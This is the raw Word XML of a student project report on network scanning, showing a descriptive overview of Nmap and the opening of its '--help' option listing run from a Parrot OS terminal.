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2B76A" w14:textId="77777777" w:rsidR="002037FC" w:rsidRDefault="002037FC" w:rsidP="00FA403C">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6930"/>
          <w:tab w:val="left" w:pos="8550"/>
        </w:tabs>
        <w:ind w:left="-450" w:right="810"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CD3400A" w14:textId="77777777" w:rsidR="00482AD6" w:rsidRDefault="00FA403C" w:rsidP="00FA403C">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6930"/>
          <w:tab w:val="left" w:pos="8550"/>
        </w:tabs>
        <w:ind w:left="-450" w:right="810"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>PROJECT- 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4C9400" w14:textId="77777777" w:rsidR="00FA403C" w:rsidRPr="00482AD6" w:rsidRDefault="00FA403C" w:rsidP="00FA403C">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6930"/>
          <w:tab w:val="left" w:pos="8550"/>
        </w:tabs>
        <w:ind w:left="-450" w:right="810"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00482AD6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>SCANNING, CHECKING FOR VULNERABILITY AND EXPLOITS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D6B211" w14:textId="68A89A2D" w:rsidR="0019173E" w:rsidRPr="00482AD6" w:rsidRDefault="00FA403C" w:rsidP="0019173E">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6930"/>
          <w:tab w:val="left" w:pos="8550"/>
        </w:tabs>
        <w:ind w:left="-450" w:right="810"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00482AD6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0019173E" w:rsidRPr="00482AD6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">BY- </w:t>
      </w:r>
      <w:r w:rsidR="006A1C0F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Parmjeet Singh Kainth</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327A2FEF" w14:textId="77777777" w:rsidR="00FA403C" w:rsidRPr="002B24A4" w:rsidRDefault="00FA403C" w:rsidP="0019173E">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6930"/>
          <w:tab w:val="left" w:pos="8550"/>
        </w:tabs>
        <w:ind w:left="-450" w:right="810"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="148DC409" w14:textId="77777777" w:rsidR="005C7CA3" w:rsidRPr="002B24A4" w:rsidRDefault="005C7CA3" w:rsidP="005C7CA3">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6930"/>
          <w:tab w:val="left" w:pos="8550"/>
        </w:tabs>
        <w:ind w:left="-450" w:right="810"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>NMAP  OF A WEBSITE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA64970" w14:textId="77777777" w:rsidR="00A627C8" w:rsidRPr="002B24A4" w:rsidRDefault="00A627C8" w:rsidP="00A627C8">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Nmap ("Network Mapper") is a free and open source (</w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="002B24A4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
            <w:color w:val="774EBD"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>license</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>) utility for network discovery and security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. It was designed to rapidly scan large networks, but works fine against single hosts. Nmap runs on all major computer operating systems, and official binary packages are available for Linux, Windows, and Mac OS X. In addition to the classic command-line Nmap executable, the Nmap suite includes an advanced GUI and results viewer (</w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="002B24A4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
            <w:color w:val="774EBD"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>Zenmap</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>), a flexible data transfer, redirection, and debugging tool (</w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="002B24A4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
            <w:color w:val="774EBD"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>Ncat</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>), a utility for comparing scan results (</w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="002B24A4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
            <w:color w:val="774EBD"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>Ndiff</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>), and a packet generation and response analysis tool (</w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidRPr="002B24A4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
            <w:color w:val="774EBD"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>Nping</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5C220F" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00A627C8" w:rsidP="0057440B">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Nmap was named “Security Product of the Year” by Linux Journal, Info World, LinuxQuestions.Org, and Codetalker Digest. It was even featured in </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidRPr="002B24A4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
            <w:color w:val="774EBD"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>twelve movies</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>, including </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:anchor="matrix" w:history="1">
        <w:r w:rsidRPr="002B24A4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
            <w:color w:val="774EBD"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>The Matrix Reloaded</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:anchor="diehard4" w:history="1">
        <w:r w:rsidRPr="002B24A4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
            <w:color w:val="774EBD"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>Die Hard 4</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:anchor="gwtdt" w:history="1">
        <w:r w:rsidRPr="002B24A4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
            <w:color w:val="774EBD"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>Girl With the Dragon Tattoo</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>, and </w:t>
      </w:r>
      <w:hyperlink r:id="rId15" w:anchor="bourne" w:history="1">
        <w:r w:rsidRPr="002B24A4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
            <w:color w:val="774EBD"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>The Bourne Ultimatum</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C936127" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D030EDB" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>┌─[root@parrot]─[/home/megha]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195D9A70" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>└──╼ #nmap --help</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FA7AFA" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Nmap 7.70 ( https://nmap.org )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="424C9CD1" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Usage: nmap [Scan Type(s)] [Options] {target specification}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1028C928" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>TARGET SPECIFICATION:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B9C519" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  Can pass hostnames, IP addresses, networks, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CCB0115" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  Ex: scanme.nmap.org, microsoft.com/24, 192.168.0.1; 10.0.0-255.1-254</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F57AE4" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  -iL &lt;inputfilename&gt;: Input from list of hosts/networks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7844D5" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  -iR &lt;num hosts&gt;: Choose random targets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F58E93" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  --exclude &lt;host1[,host2][,host3],...&gt;: Exclude hosts/networks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656B6628" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  --excludefile &lt;exclude_file&gt;: Exclude list from file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643AF4AE" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>HOST DISCOVERY:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C9A37B" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  -sL: List Scan - simply list targets to scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06919196" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  -sn: Ping Scan - disable port scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198ACA30" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  -Pn: Treat all hosts as online -- skip host discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7B4ABB" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  -PS/PA/PU/PY[portlist]: TCP SYN/ACK, UDP or SCTP discovery to given ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20EEEA16" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  -PE/PP/PM: ICMP echo, timestamp, and netmask request discovery probes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0897151A" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  -PO[protocol list]: IP Protocol Ping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27114862" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  -n/-R: Never do DNS resolution/Always resolve [default: sometimes]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D12AB72" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  --dns-servers &lt;serv1[,serv2],...&gt;: Specify custom DNS servers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30481812" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  --system-dns: Use OS's DNS resolver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D03458" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
